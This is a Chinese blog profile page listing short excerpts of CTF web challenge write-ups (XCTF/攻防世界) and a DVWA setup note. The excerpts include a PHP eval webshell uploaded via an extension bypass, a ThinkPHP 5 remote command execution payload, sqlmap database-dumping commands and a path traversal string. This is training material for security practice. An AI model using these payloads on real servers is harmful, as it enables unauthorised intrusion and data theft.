- 博客(15)
- 收藏
- 关注
原创 关于打不开 xxx.github.io的一种解决办法(不一定对所有人有效)
声明:这只是我的一种解决办法(虽然找了很久,但是很简单),不一定有效,但是要是对大家有效的话就最好了先说说踩得坑(其实有些也得到了解决,但是不完全):1、修改host文件修改后,能访问到了我自己的xxx.github.io但是访问不到其他人的,emmm,理论上把你想看的人的都修改了应该也阔以…但是有点麻烦…2、修改DNS呃…好像对我没什么用…解决问题环节首先我的校园网是移动的,然后两张其中一张电话卡也是移动的一开始以为是校园网的问题,但是后来用手机热点给电脑连还是不行…然后然后然后
2020-09-28 10:31:37 2188 3
转载 【转载】用phpstudy搭建DVWA安装中遇到的一些问题的解决方案
用phpstudy搭建DVWA中遇到的一些问题的解决方案软件搭建环境:phpstudy_pro1.修改数据库账号信息修改数据库账号密码等配置信息在dvwa里的config文件夹里.\DVWA-master\config\config.inc.php将config.inc.php.bak改成config.inc.php2.PHP function allow_url_include: Disabled配置时出现了PHP function allow_url_include: Disab
2020-08-19 18:31:12 2518
原创 攻防世界web二分题(supersqli)
读题题目描述:随便注 提示我们这是一道注入题解题步骤提交个1试一下再在1后面加个单引号试试1'报错了,然后判断有几个字段
2020-08-12 21:30:38 213
原创 攻防世界web高阶3分题(easytornado)
读题PS: tornado 查资料发现 Tornado (python的web框架)打开题目发现三个文件第一个文件说明flag应该是在fllllllllllllag文件中再进入第二个文件进入第三个文件发现提示md5(cookie_secret + md5(filename)),即先将filenamemd5加密,再将cookie_secret与md5加密后的filename进行md5加密,也就是说,目前我们需要知道的是filename和cookie_secret测试
2020-08-01 20:25:44 336
原创 攻防世界web高阶2分题(PHP2)
读题一看懵了…不知道要干啥参考大佬wp /index.phps发现代码泄露查看源代码分析代码:第一步,要使得"admin"===$_GET[id]不成立第二步,经过$_GET[id] = urldecode($_GET[id]);,使得$_GET[id] == "admin"成立。具体当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode然后在这段代码中运行时,会自动进行一次urldecode在urldecode()函数中,再一次进
2020-08-01 19:30:00 344
原创 攻防世界web高阶2分题(NewsCenter)
读题发现是一个搜索框,觉得是个sql注入随便输入什么,我这里输入aaa,然后抓包PS:一定要抓搜索后的包然后将抓到的包保存在桌面1.txt然后用sqlmap注入1、查找数据库python sqlmap.py -r D:\360data\重要数据\桌面\1.txt --dbs2、查找news下的表python sqlmap.py -r D:\360data\重要数据\桌面\1.txt --tables -D news3、建立可后台news库连接, 搜索所有的数据pyt
2020-08-01 18:07:50 232
原创 攻防世界高阶web2分题(ics-06)
读题发现只有 报表中心 能点进去看到id=1 想到可能是用burp进行爆破先抓包线程越高,速度越快爆破完成后点击Length,发现只有2333长度不一样拿到flagburp爆破功能详解: 链接...
2020-08-01 16:27:31 201
原创 攻防世界2分题(Web_php_include)
看题一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。绕过str_replace函数,经查资料知道str_replace这个函数及其不安全关于绕过函数str_replace的方法1.大小写绕过2. 双写绕过这里用大小写绕过抓包..
2020-08-01 15:54:36 310
原创 攻防世界web高阶1分题(Training-WWW-Robots)
读题根据题目提示,进入robots.txt打开flag所在位置fl0g.php,拿到flag
2020-07-30 18:08:00 133
原创 攻防世界web高阶1分题(baby_web)
首先看题目所给的提示注:这里提示初始页面,就想到了index.php打开题目打开index.php,发现又跳转1.php,按下F12,查看数据包找到flag
2020-07-30 18:01:34 204
原创 攻防世界web2分题(NaNNaNNaNNaN-Batman)
一个附件打开来是一串乱码最后有个eval(),应该是这个运行后造成了乱码改成alert() 用浏览器打开发现源码整理后看了看要求长度为16以be0f23开头以e98aa结尾包含233ac包含c7be9得到be0f233ac7be98aa输入拿到flag...
2020-07-25 18:57:10 159
原创 攻防世界web2分题(warmup)
进去发现是个大大的笑脸看下源码发现源码里有个source.php打开又发现hint.php,打开,找到了flag位置构造payload?file=source.php?/../../../../ffffllllaaaagggg第一个?表示传参,第二个?用来满足截取拿到flag...
2020-07-25 18:37:21 144
原创 攻防世界web2分题(php-rce)
ThinkPHP版本5的相关漏洞发现版本号查了查漏洞构造payload?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls修改下,寻找flag?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]
2020-07-25 18:30:00 169
原创 web攻防世界2分题(upload1)
读题发现是一个文件上传查看源码点击鼠标右键,再点击查看源码发现只能上传jpg 和 png格式想着可以上传一个一句话木马<?php @eval($_POST['helter']);?>在记事本中将txt后缀改成jpg上传用burp抓取上传包然后用蚁剑连接1、鼠标右键点击左边空白处,选择添加数据2、URL地址填题目地址+上传文件路径也就是http://220.249.52.133:36407/upload/1595668911.upload.php密码就是一句话木马
2020-07-25 17:37:57 217
原创 攻防世界2分题(Web_python_template_injection)
读题注:由于自己资历尚浅,以下WP引用攻防世界EndermaN大佬提供的思路-首先看到题目,就知道这道题是关于模板注入的,什么是模板注入呢?为了写html代码的时候方便,很多网站都会使用模板,先写好一个html模板文件,比如:deftest():code=request.args.get('id')html=''' <h3>%s</h3>'''%(code)return render_template_string(html)这段代码中的html就是一个简单的模
2020-07-25 14:02:31 309
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人